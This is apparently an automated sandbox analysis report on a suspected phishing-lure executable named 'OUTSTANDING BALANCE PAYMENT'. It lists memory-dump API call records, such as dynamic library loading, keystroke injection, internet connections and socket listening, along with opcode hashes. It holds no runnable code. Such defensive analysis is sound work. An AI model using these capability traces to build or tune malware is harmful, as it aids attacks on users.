                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                  • API String ID: 2574300362-1816364905
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,002DBAD3,00000001,002DB6EE,?,0031DC00), ref: 002DBAEB
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002DBAFD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                  • API String ID: 2574300362-199464113
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,002E3BD1,?,002E3E06), ref: 002E3BE9
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002E3BFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 2574300362-4033151799
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 002DAAB4
                                                                  • CoUninitialize.OLE32 ref: 002DAABF
                                                                    • Part of subcall function 002C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002C027B
                                                                  • VariantInit.OLEAUT32(?), ref: 002DAACA
                                                                  • VariantClear.OLEAUT32(?), ref: 002DAD9D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                  • String ID:
                                                                  • API String ID: 780911581-0
                                                                  • Opcode ID: 4d33ab442324776a13b1ab2c0f6c7d59a0085cdef601008653b6f92efeb1d56a
                                                                  • Instruction ID: 935b42487705708097bed98246a13adc0f7573861a08eea8cfd27d2522dac20e
                                                                  • Opcode Fuzzy Hash: 4d33ab442324776a13b1ab2c0f6c7d59a0085cdef601008653b6f92efeb1d56a
                                                                  • Instruction Fuzzy Hash: 06A127352247019FDB11EF14C891F2AB7E5BF88710F14444AF9969B3A2CB70ED65CB86
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                  • String ID:
                                                                  • API String ID: 2808897238-0
                                                                  • Opcode ID: 175daa7ef90fc0823bc700fc2d4d0f7d2bc9cb2a185c18b802ff1772bba14c4e
                                                                  • Instruction ID: dea500df6d8c18db500a2e5c3f4351c45c0bb19f6413e438ac129928c6191e83
                                                                  • Opcode Fuzzy Hash: 175daa7ef90fc0823bc700fc2d4d0f7d2bc9cb2a185c18b802ff1772bba14c4e
                                                                  • Instruction Fuzzy Hash: A851B4346343069BDB24AF65D491BAEB3E9EF45394F20881FE756C72D1DB7098E08B01
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 3877424927-0
                                                                  • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                  • Instruction ID: 8e8aa9b7f419258f5493a3c59e9470cd6060a27cb6e72f02b4fa5ff04a907c7c
                                                                  • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                  • Instruction Fuzzy Hash: 4A51ABB1A20306ABDB24CF698D8456EB7A5AF42720F244729F825962D0DF74DF718F44
                                                                  APIs
                                                                    • Part of subcall function 00284517: _fseek.LIBCMT ref: 0028452F
                                                                    • Part of subcall function 002CC56D: _wcscmp.LIBCMT ref: 002CC65D
                                                                    • Part of subcall function 002CC56D: _wcscmp.LIBCMT ref: 002CC670
                                                                  • _free.LIBCMT ref: 002CC4DD
                                                                  • _free.LIBCMT ref: 002CC4E4
                                                                  • _free.LIBCMT ref: 002CC54F
                                                                    • Part of subcall function 002A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,002A7A85), ref: 002A1CB1
                                                                    • Part of subcall function 002A1C9D: GetLastError.KERNEL32(00000000,?,002A7A85), ref: 002A1CC3
                                                                  • _free.LIBCMT ref: 002CC557
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                  • String ID:
                                                                  • API String ID: 1552873950-0
                                                                  • Opcode ID: 175c17775220f26e0e0cd87b3ee38f03475ae72a0804ab278d6a86c3e5061848
                                                                  • Instruction ID: 1db0c1ee4d505154631f7ccf0a99d882b08a47fea97bd4fe01970a1c293c7767
                                                                  • Opcode Fuzzy Hash: 175c17775220f26e0e0cd87b3ee38f03475ae72a0804ab278d6a86c3e5061848
                                                                  • Instruction Fuzzy Hash: 5D5163B5914219AFDF14AF64DC41BAEBBB9EF48310F10409EF21DA3281DB715A90CF59
                                                                  APIs
                                                                  • GetWindowRect.USER32(01206410,?), ref: 002EC544
                                                                  • ScreenToClient.USER32(?,00000002), ref: 002EC574
                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 002EC5DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientMoveRectScreen
                                                                  • String ID:
                                                                  • API String ID: 3880355969-0
                                                                  • Opcode ID: cd2681d1ba81b9ef1ea5733bcfbfe9f53d7d5ef4c87c36a3e67f27a254889250
                                                                  • Instruction ID: a2db269f16a443ab426ac95518969699967e0683efcbb8b03020ba21119011f7
                                                                  • Opcode Fuzzy Hash: cd2681d1ba81b9ef1ea5733bcfbfe9f53d7d5ef4c87c36a3e67f27a254889250
                                                                  • Instruction Fuzzy Hash: C9519275950245EFCF11DFA9C880AAE77B9FF85320FA08259F8259B290D730ED92CB50
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002BC462
                                                                  • __itow.LIBCMT ref: 002BC49C
                                                                    • Part of subcall function 002BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002BC753
                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 002BC505
                                                                  • __itow.LIBCMT ref: 002BC55A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: b14ceb2c1203572266295a02e9bbb3a8e398b7385f20960d97f2d4dda1a16ebf
                                                                  • Instruction ID: 4e926d7362b2b27c08856490b62ffa3add1ddb770b0118d890bac64d890d1b33
                                                                  • Opcode Fuzzy Hash: b14ceb2c1203572266295a02e9bbb3a8e398b7385f20960d97f2d4dda1a16ebf
                                                                  • Instruction Fuzzy Hash: FD41E475A10209AFDF21EF54C856FEE7BB9AF49740F100019FA05B3281DB749A65CFA1
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002C3966
                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 002C3982
                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 002C39EF
                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 002C3A4D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 7611ef043be5d78ebd34e13912413e04732cdb097a904e83ce0da9a96837822a
                                                                  • Instruction ID: 65c807039659d106dde2554315814fe706e4a1d65041d2b786a80aae476f85a8
                                                                  • Opcode Fuzzy Hash: 7611ef043be5d78ebd34e13912413e04732cdb097a904e83ce0da9a96837822a
                                                                  • Instruction Fuzzy Hash: 17412930A20248AAEF30CF648805FFDBBB99B55310F04874EE4C1A21C1C7B59EA4DB61
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002EB5D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: a11f944c4ccf0d917846fa5d0208f77c5be8624e7ebeb9ee97205705184b950a
                                                                  • Instruction ID: 6aa8c34e8f3b52323720faffdd61f9dc404fe8faf53b982a002b3f6736ba1c75
                                                                  • Opcode Fuzzy Hash: a11f944c4ccf0d917846fa5d0208f77c5be8624e7ebeb9ee97205705184b950a
                                                                  • Instruction Fuzzy Hash: AB31F4746A1185ABEF239F5ACC89FAA7768EB06310FD04502FA51D61E1C770E9608B51
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 002ED807
                                                                  • GetWindowRect.USER32(?,?), ref: 002ED87D
                                                                  • PtInRect.USER32(?,?,002EED5A), ref: 002ED88D
                                                                  • MessageBeep.USER32(00000000), ref: 002ED8FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1352109105-0
                                                                  • Opcode ID: de1a546213f98f7e88d0be4ec94d9212369775513f5bb6c553449c8927e96868
                                                                  • Instruction ID: 0022be2016e0c6a31a81f462e8af748f7941536a524d0676e6e10ce61e2457db
                                                                  • Opcode Fuzzy Hash: de1a546213f98f7e88d0be4ec94d9212369775513f5bb6c553449c8927e96868
                                                                  • Instruction Fuzzy Hash: 3541CF74A50289DFCB12CF5AC880BA97BF9FF46310F5981A9E8148F250C730E852CF40
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 002C3AB8
                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 002C3AD4
                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 002C3B34
                                                                  • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 002C3B92
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 2b74ea3488c69f8c285f9e653b5c64f621098b039466d8e4e7916b2fc010953c
                                                                  • Instruction ID: b2312052cc33a2aca2db42779eeccb54239bb9d64e08b70006c3ad8db14b9879
                                                                  • Opcode Fuzzy Hash: 2b74ea3488c69f8c285f9e653b5c64f621098b039466d8e4e7916b2fc010953c
                                                                  • Instruction Fuzzy Hash: 90316830920258AEEF21DB648819FFE7BB9AB45318F044B1EE485931C1CB759F65CB61
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002B4038
                                                                  • __isleadbyte_l.LIBCMT ref: 002B4066
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002B4094
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002B40CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: 2561736f6c7e0a614b69d48f3f119eda5d5ad0d42220d32a5a2bf69ac56abf15
                                                                  • Instruction ID: 68a7074c6994db627ea26361c99c0c82d094a4f19c2c501a6b01aa2d78276612
                                                                  • Opcode Fuzzy Hash: 2561736f6c7e0a614b69d48f3f119eda5d5ad0d42220d32a5a2bf69ac56abf15
                                                                  • Instruction Fuzzy Hash: 0731D430520216AFDB29BF74C884BFA7BB5FF41390F154819EA6187092E731D8B0DB90
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 002E7CB9
                                                                    • Part of subcall function 002C5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 002C5F6F
                                                                    • Part of subcall function 002C5F55: GetCurrentThreadId.KERNEL32 ref: 002C5F76
                                                                    • Part of subcall function 002C5F55: AttachThreadInput.USER32(00000000,?,002C781F), ref: 002C5F7D
                                                                  • GetCaretPos.USER32(?), ref: 002E7CCA
                                                                  • ClientToScreen.USER32(00000000,?), ref: 002E7D03
                                                                  • GetForegroundWindow.USER32 ref: 002E7D09
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                  • String ID:
                                                                  • API String ID: 2759813231-0
                                                                  • Opcode ID: 25fc7d69c3b60b254489d97d584a58e54706146abda1dc1265636461b33c9f4c
                                                                  • Instruction ID: ae21da8e63f37f549e43ec43fc001f8091de905e4eced365f1a936bb9e49daa4
                                                                  • Opcode Fuzzy Hash: 25fc7d69c3b60b254489d97d584a58e54706146abda1dc1265636461b33c9f4c
                                                                  • Instruction Fuzzy Hash: 9B311E72910108AFDB11EFA9D8459EFBBFDEF54310B11846AE815E3211DA31AE55CFA0
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • GetCursorPos.USER32(?), ref: 002EF211
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,002FE4C0,?,?,?,?,?), ref: 002EF226
                                                                  • GetCursorPos.USER32(?), ref: 002EF270
                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,002FE4C0,?,?,?), ref: 002EF2A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                  • String ID:
                                                                  • API String ID: 2864067406-0
                                                                  • Opcode ID: 9e2d2e0dae15df3a319c24c780469df7254cdc3224962522542f53c097e5b779
                                                                  • Instruction ID: e5c3c80698f4b40c26d5f6d5c6fd13a64a154af79f7847d29a7e72fa136585c4
                                                                  • Opcode Fuzzy Hash: 9e2d2e0dae15df3a319c24c780469df7254cdc3224962522542f53c097e5b779
                                                                  • Instruction Fuzzy Hash: 0621B139611418AFDB168F95DD58EEE7BB9EF0A310F444069FE094B2A1D3349D60DB50
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002D4358
                                                                    • Part of subcall function 002D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002D4401
                                                                    • Part of subcall function 002D43E2: InternetCloseHandle.WININET(00000000), ref: 002D449E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 1463438336-0
                                                                  • Opcode ID: ab73a464a2651d7703f3b4d1fbe89636cda5525fcf3e454f9619e77d8dd3c8b8
                                                                  • Instruction ID: 58bce58bf6206e4702bb15bc321fff8d2d5dd8bf9ad88e88fe48d91eef4d96dd
                                                                  • Opcode Fuzzy Hash: ab73a464a2651d7703f3b4d1fbe89636cda5525fcf3e454f9619e77d8dd3c8b8
                                                                  • Instruction Fuzzy Hash: EF219231211605BBDB12AF649C00F7BB7E9FF48710F24401BBA5596750D7B19C319B90
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 002E8AA6
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002E8AC0
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002E8ACE
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002E8ADC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$AttributesLayered
                                                                  • String ID:
                                                                  • API String ID: 2169480361-0
                                                                  • Opcode ID: 95e93b515142c917e654c1a0f14fe0bff2ea780820059299e3ddaf5e07d2e22d
                                                                  • Instruction ID: ed138a44fd230eb03b49c338e6f96da69866a37182b24ee91d70a0d5f3d053d3
                                                                  • Opcode Fuzzy Hash: 95e93b515142c917e654c1a0f14fe0bff2ea780820059299e3ddaf5e07d2e22d
                                                                  • Instruction Fuzzy Hash: 6411B131266111AFD705AB59CC15FBA779DBF85320F14411AF95ACB2E2CF70AC208B90
                                                                  APIs
                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 002D8AE0
                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 002D8AF2
                                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 002D8AFF
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8B16
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastacceptselect
                                                                  • String ID:
                                                                  • API String ID: 385091864-0
                                                                  • Opcode ID: 7390e0deec01423fb155dea6ee04f46ca0ed88b08f893ac3873bf68c78d91d9d
                                                                  • Instruction ID: a12bbc77e3deca0f1eff298c71ed3ee41002f49ec476c8674f79a44d316fe4f6
                                                                  • Opcode Fuzzy Hash: 7390e0deec01423fb155dea6ee04f46ca0ed88b08f893ac3873bf68c78d91d9d
                                                                  • Instruction Fuzzy Hash: 9A219372A01124AFC7119F68C895A9EBBFCEF49710F00416BF849D7291DB74DE458F90
                                                                  APIs
